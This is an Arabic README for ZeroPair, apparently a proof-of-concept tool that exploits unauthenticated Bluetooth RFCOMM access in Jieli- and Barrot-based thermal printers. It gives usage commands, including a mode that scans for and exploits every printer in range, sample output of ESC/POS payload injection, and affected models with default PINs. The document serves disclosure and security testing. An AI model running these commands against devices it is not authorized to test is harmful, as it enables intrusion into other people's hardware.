
أداة إثبات مفهوم توضح تجاوز الوصول عبر Bluetooth RFCOMM بدون مصادقة في الطابعات الحرارية المعرّضة للثغرات.
استغلال بلوتوث بدون مصادقة
"اسرق الطباعة، وامتلك النظام"
███████╗███████╗██████╗ ██████╗
╚══███╔╝██╔════╝██╔══██╗██╔═══██╗
███╔╝ █████╗ ██████╔╝██║ ██║
███╔╝ ██╔══╝ ██╔══██╗██║ ██║
███████╗███████╗██║ ██║╚██████╔╝
╚══════╝╚══════╝╚═╝ ╚═╝ ╚═════╝
██████╗ █████╗ ██╗██████╗
██╔══██╗██╔══██╗██║██╔══██╗
██████╔╝███████║██║██████╔╝
██╔═══╝ ██╔══██║██║██╔══██╗
██║ ██║ ██║██║██║ ██║
╚═╝ ╚═╝ ╚═╝╚═╝╚═╝ ╚═╝
المؤلف: [CBKB] DeadlyData | 2026
ZeroPair هي أداة إثبات مفهوم تستعرض ثغرة انعدام المصادقة في الطابعات الحرارية التي تدعم البلوتوث والتي تستخدم شرائح Jieli وBarrot. تقبل الأجهزة المتأثرة اتصالات RFCOMM غير المصادق عليها دون الحاجة إلى إقران أو تفاعل من المستخدم، مما يسمح للمهاجم داخل نطاق البلوتوث بالوصول إلى واجهة أوامر الطابعة.
CVE: تم التقديم إلى MITRE (قيد التخصيص)
| ZeroPair إثبات المفهوم |
تحتوي الطابعات الحرارية التي تدعم البلوتوث والمزوّدة بشرائح بلوتوث Jieli وBarrot على ثغرة تجاوز للمصادقة في خدمة RFCOMM (SPP). نتيجة لتحكم غير سليم في الوصول مطبّق في البرنامج الثابت، تقبل الأجهزة المتأثرة اتصالات RFCOMM غير مصادق عليها دون الحاجة إلى إقران أو تفاعل من المستخدم. توجد الثغرة في حالة ثقة مخفية في البرنامج الثابت لا يمكن فحصها أو إزالتها باستخدام أدوات إدارة البلوتوث القياسية.
| التصنيف | الخطورة |
|---|---|
| انعدام المصادقة | حرجة |
| ثقة إقران دائمة | عالية |
| حالة إقران مخفية | عالية |
| تجاوز مصادقة غير معروف | عالية |
قد تتأثر أيضًا طابعات حرارية أخرى تعمل بالبلوتوث وتستخدم هذه الشرائح.
bluez - حزمة بروتوكول بلوتوث (hcitool, bluetoothctl, rfcomm, sdptool)التثبيت على Debian/Ubuntu:
sudo apt install bluez
coloramapip install colorama
يتطلب ZeroPair صلاحيات الجذر لعمليات RFCOMM.
ينفذ تحققًا كاملاً من الثغرة عبر 4 خطوات قبل الاستغلال:
sudo python3 ZeroPair.py <MAC_ADDRESS>
sudo python3 ZeroPair.py 66:32:9E:2E:FD:94
يتخطى التحقق ويحاول الاستغلال المباشر:
sudo python3 ZeroPair.py <MAC_ADDRESS> --skip
يمسح جميع أجهزة البلوتوث، ويحدد الطابعات، ويتحقق منها، ويستغلها:
sudo python3 ZeroPair.py --scan
أسرع وضع - يمسح ويستغل دون تحقق:
sudo python3 ZeroPair.py --scan --skip
bluetoothctl/var/lib/bluetooth/)تنفذ الطابعات المتأثرة سياسة قبول متساهلة لـ RFCOMM على مستوى البرنامج الثابت. لا يفرض وحدة تحكم البلوتوث المصادقة أو التشفير على اتصالات SPP الواردة. ولأن حالة الثقة تُدار في البرنامج الثابت بدلاً من حزمة بلوتوث المضيف (BlueZ)، فإن الأدوات القياسية مثل bluetoothctl لا تستطيع اكتشاف الثقة الضمنية أو فحصها أو إبطالها. يقبل الجهاز الاتصالات بصمت من أي مضيف بلوتوث دون تفاعل من المستخدم.
[*] single target mode (validation enabled)
[*] ==========================================================
[*] target: 66:32:9E:2E:FD:94 (X6h-A725)
[*] model: X6h-A725
[*] ==========================================================
[*] starting vulnerability validation...
[*] testing user-space pairing visibility [DONE]
[*] identifying local bluetooth adapter [DONE]
[*] checking filesystem pairing cache [DONE]
[*] testing RFCOMM unauthenticated access [DONE]
[!] VULNERABILITY CONFIRMED
Type: ZERO AUTHENTICATION
Severity: CRITICAL
[*] vulnerability details:
[+] RFCOMM accessible: YES
[+] BlueZ visible: NO
[+] BlueZ paired: NO
[+] Cache exists: NO
[+] target is exploitable - proceeding with attack
[*] discovering RFCOMM channels [channel 1]
[*] establishing RFCOMM connection [CONNECTED]
[*] injecting ESC/POS payload [SUCCESS]
[*] exploitation successful - check printer output!
[+] exploitation completed successfully
هذه الأداة مخصصة لاختبار الأمن المصرح به والأغراض التعليمية فقط. الوصول غير المصرح به إلى أنظمة الكمبيوتر غير قانوني. لا يتحمل المؤلف أي مسؤولية وليس مسؤولًا عن أي إساءة استخدام أو ضرر ناجم عن هذه الأداة. استخدمها بمسؤولية وفقط على الأنظمة التي تملكها أو لديك إذن صريح لاختبارها.
MIT
| الطراز | الشركة المصنعة | الشريحة | رمز PIN الافتراضي | مجموعة الأوامر |
|---|
| X6h-A725 | Zhuhai Jieli | Jieli | 1234 | ESC/POS |
| M58-L | Zhuhai Jieli | Jieli | 1234 | ESC/POS |
| D450 | Omezizy | Barrot | 0000 | TSPL |
| الوسيطة | الاختصار | الوصف |
|---|
target | عنوان MAC الهدف (مثال: 66:32:9E:2E:FD:94) | |
--scan | -a | وضع المسح التلقائي: العثور على جميع الطابعات واستغلالها |
--skip | -s | تخطي التحقق من الثغرة (أسرع) |